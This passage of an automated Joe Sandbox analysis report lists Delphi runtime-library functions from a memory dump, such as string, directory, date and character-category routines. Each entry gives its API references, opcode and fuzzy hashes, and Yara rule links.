                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1550118436-0
                                                                                                  • Opcode ID: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                  • Instruction ID: 078013d5af54c5226b3ab0755ea7a38ccff1b0ce4df6d013d20a1ea011b46d79
                                                                                                  • Opcode Fuzzy Hash: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                  • Instruction Fuzzy Hash: 12F05971500685BFD700CF64EC52C5AB7ACEB86710F918372F90897340EB31AE04C6D0
                                                                                                  Function 50015C58 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50015CAE), ref: 50015C87
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50015CAE), ref: 50015C93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Asg$qqrr20StringStringx20System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2900266584-0
                                                                                                  • Opcode ID: 980095aa4e241e9a3d1db5ea2f41c3d6ed3e039b286bf848a9136646c47f4e17
                                                                                                  • Instruction ID: 0a1459572a6aba790754909bdfcb037c330aa85f6d23f18ce1b31e8537a0f504
                                                                                                  • Opcode Fuzzy Hash: 980095aa4e241e9a3d1db5ea2f41c3d6ed3e039b286bf848a9136646c47f4e17
                                                                                                  • Instruction Fuzzy Hash: D7F0A730605288EFAB15DF99DD2286EBBECDF996507A14573F904D7310E6709E00D6D0
                                                                                                  Function 500043E4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LGetDir$qqrucr27System@%AnsiStringT$us$i0$%.RTL120(00000000,50004446), ref: 50004409
                                                                                                    • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                    • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                    • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                    • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                    • Part of subcall function 500042F0: @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                  • @System@@LStrToString$qqrv.RTL120(00000000,50004446), ref: 5000441C
                                                                                                    • Part of subcall function 50008BDC: @System@Move$qqrpxvpvi.RTL120(?,50004421,00000000,50004446), ref: 50008BF2
                                                                                                  • @System@@PStrNCpy$qqrp28System@%SmallString$iuc$255%t1uc.RTL120(00000000,50004446), ref: 5000442B
                                                                                                    • Part of subcall function 50004F14: @System@Move$qqrpxvpvi.RTL120(?,50004430,00000000,50004446), ref: 50004F26
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000444D), ref: 50004440
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CurrentDirectory$System@%$AnsiMove$qqrpxvpviStringSystem@$Array$qqrr27Clr$qqrpvCpy$qqrp28Dir$qqrucr27FreeFromMem$qqrpvSmallString$iuc$255%t1ucString$qqrvT$us$i0$%T$us$i0$%pcius
                                                                                                  • String ID:
                                                                                                  • API String ID: 506161246-0
                                                                                                  • Opcode ID: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                  • Instruction ID: 1f1c8239afc9ae75611213fcacec5c0f4d323074735c47231db78d41111fae57
                                                                                                  • Opcode Fuzzy Hash: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                  • Instruction Fuzzy Hash: 6EF0E9B0A042489FE714DF95EDA199EB3BAFBC8300FD042BAA90493741DB741F048595
                                                                                                  Function 5002151C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021542
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002154A
                                                                                                  • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValue.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021553
                                                                                                    • Part of subcall function 50021408: @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50021577,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 5002156A
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%Sysutils@$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FreeFromMem$qqrpvPower10$qqrvSystem@T$us$i0$%T$us$i0$%pbusTextValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3332700872-0
                                                                                                  • Opcode ID: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                  • Instruction ID: d635544f2e29b8d36e0ff77d7db167ac281d6be62c4688162a595b10ac468aae
                                                                                                  • Opcode Fuzzy Hash: 3868efb18936c867525fd66657176d425ff5bb23a5c2c67d669c6902671eb1b7
                                                                                                  • Instruction Fuzzy Hash: 4EF05C31705244ABE304DAA5FC22A5DF6DDDFDA240FE10176F504D3341D9309E018290
                                                                                                  Function 50026668 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026677
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 50026695
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500266BB,?,?,?,?,00000000), ref: 500266A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1550118436-0
                                                                                                  • Opcode ID: 7999dc591e2fe863dded708c101b128678d951501262c20680e16ba129308214
                                                                                                  • Instruction ID: 6d5eb7f83aa1e2fd7c5966daae1cddd1a1bec88c9349280672d0eb764180ee1f
                                                                                                  • Opcode Fuzzy Hash: 7999dc591e2fe863dded708c101b128678d951501262c20680e16ba129308214
                                                                                                  • Instruction Fuzzy Hash: B6F02771201585AFE701C6A4ED66C5EB7ADDB8AA50F914773F90493250EB319E05C1D0
                                                                                                  Function 50011068 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5001106D
                                                                                                  • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 50011080
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011090
                                                                                                  • @Character@TCharacter@CheckPunctuation$qqr26Character@TUnicodeCategory.RTL120 ref: 500110C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckPunctuation$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 484436152-0
                                                                                                  • Opcode ID: 52ede1bb95d7295b06e80802bbd38fe83311b756c692b49ea5d382278e8cd971
                                                                                                  • Instruction ID: 7d71bda536cb03520909d9fae99c602a8809cf4c5d9d924bc7c1391ccae14e08
                                                                                                  • Opcode Fuzzy Hash: 52ede1bb95d7295b06e80802bbd38fe83311b756c692b49ea5d382278e8cd971
                                                                                                  • Instruction Fuzzy Hash: FFF0B490B154A00BD3148761EC6167433E2A799306749417EF487CFA97DB3985E9E720
                                                                                                  Function 500114F4 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500114F9
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 5001150C
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5001151C
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120 ref: 50011555
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckSymbol$qqr26Unicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 691609695-0
                                                                                                  • Opcode ID: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                  • Instruction ID: 7b396b0d8ffb9378e5810028f15ef3c5548f1d5ddace2a8aa8357158f6fe202e
                                                                                                  • Opcode Fuzzy Hash: fe5f3e23eb1f0a261a5750bcabd28b339d05d764b1ddcb6578aceedb70423048
                                                                                                  • Instruction Fuzzy Hash: 37F0BE91B154A04BD31887A1EC6127533E367D531274841BEF487CB2A3DB38C9E9E660
                                                                                                  Function 5000FDE0 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 5000FDE5
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120 ref: 5000FDF8
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 5000FE08
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120 ref: 5000FE41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckDigit$qqr26LetterUnicode$Initialize$qqrvLatin1$qqrb
                                                                                                  • String ID:
                                                                                                  • API String ID: 2959744918-0
                                                                                                  • Opcode ID: 4afa2171aba2d9f68dd23a365b8fc527f00494e3b3889e4d18b820f2ec625961
                                                                                                  • Instruction ID: 8531ad5159720f12bcde5a57509ad96e286a1192af97af35f1695361cdd7992d
                                                                                                  • Opcode Fuzzy Hash: 4afa2171aba2d9f68dd23a365b8fc527f00494e3b3889e4d18b820f2ec625961
                                                                                                  • Instruction Fuzzy Hash: C9F0BE91B154A00BE31487A5EC7267433E3679530278841BEF487CB6A7DF388AE9E720
                                                                                                  Function 500226AC Relevance: 6.0, APIs: 4, Instructions: 31timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@DecodeDate$qqrx16System@TDateTimerust2t2.RTL120(?,?), ref: 500226C4
                                                                                                    • Part of subcall function 500224F0: @Sysutils@DecodeDateFully$qqrx16System@TDateTimerust2t2t2.RTL120(?,?,5001D662,?,?,?,5001D662,?,?), ref: 50022503
                                                                                                  • @Sysutils@IncAMonth$qqrrust1t1i.RTL120(?,?,?), ref: 500226D3
                                                                                                    • Part of subcall function 50022708: @Sysutils@IsLeapYear$qqrus.RTL120 ref: 50022767
                                                                                                  • @Sysutils@EncodeDate$qqrususus.RTL120(?,?,?), ref: 500226E4
                                                                                                    • Part of subcall function 50022374: @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120 ref: 50022387
                                                                                                  • @Sysutils@ReplaceTime$qqrr16System@TDateTimex16System@TDateTime.RTL120(?,?,?,?,?), ref: 500226F6
                                                                                                    • Part of subcall function 50022798: @System@@TRUNC$qqrv.RTL120 ref: 500227A3
                                                                                                    • Part of subcall function 50022798: @System@Frac$qqrxg.RTL120 ref: 500227CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$DateSystem@$DecodeEncodeTime$C$qqrvDate$qqrusususDate$qqrusususr16Date$qqrx16Frac$qqrxgFully$qqrx16LeapMonth$qqrrust1t1iReplaceSystem@@Time$qqrr16Timerust2t2Timerust2t2t2Timex16Year$qqrus
                                                                                                  • String ID:
                                                                                                  • API String ID: 4205208091-0
                                                                                                  • Opcode ID: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                  • Instruction ID: 90397f2099132ae17983f43b1299ad6055f1b282f2460c1bcfdd474071a034a8
                                                                                                  • Opcode Fuzzy Hash: 588e2177f7e5a343351c1f5257f7af4bba4bff301c8b8eac32b1d71317e14410
                                                                                                  • Instruction Fuzzy Hash: 15F0A97180510FBACF009FD1E9818ECBBB9FF54219F408692F85465151EB32A769D794
                                                                                                  Function 5002D730 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                    • Part of subcall function 5002D4E0: @System@@DynArrayLength$qqrv.RTL120(?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4E8
                                                                                                    • Part of subcall function 5002D4E0: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(00000000,?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4F4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                    • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                    • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                    • Part of subcall function 5002D778: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Sysutils@$Exception@$bctr$qqrp20String$ArrayExcept$qqrvRaise$DynamicLength$qqrvSystem@%$Encoding@Recpx14Recxi$ByteCount$qqrx24$Array$tb%ii$Array$tb%Array$tb%iir25Array$tuc%iBytes$qqrx24Length$qqrrpvpvipi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2407772116-0
                                                                                                  • Opcode ID: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                  • Instruction ID: 9aaef7661f88e341657fce88e442fcf8159dd86dd4df8b5ba2cc1c183d9f0c43
                                                                                                  • Opcode Fuzzy Hash: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                  • Instruction Fuzzy Hash: BAE04F6170615427E21462AEBC42E3BA6CEC7D8A21F50413BBA09C7352DCA5EC0242E4
                                                                                                  Function 5002C220 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C22A
                                                                                                  • @System@TObject@$bctr$qqrv.RTL120(?,?,?,5002C1FA), ref: 5002C239
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,?,5002C1FA), ref: 5002C249
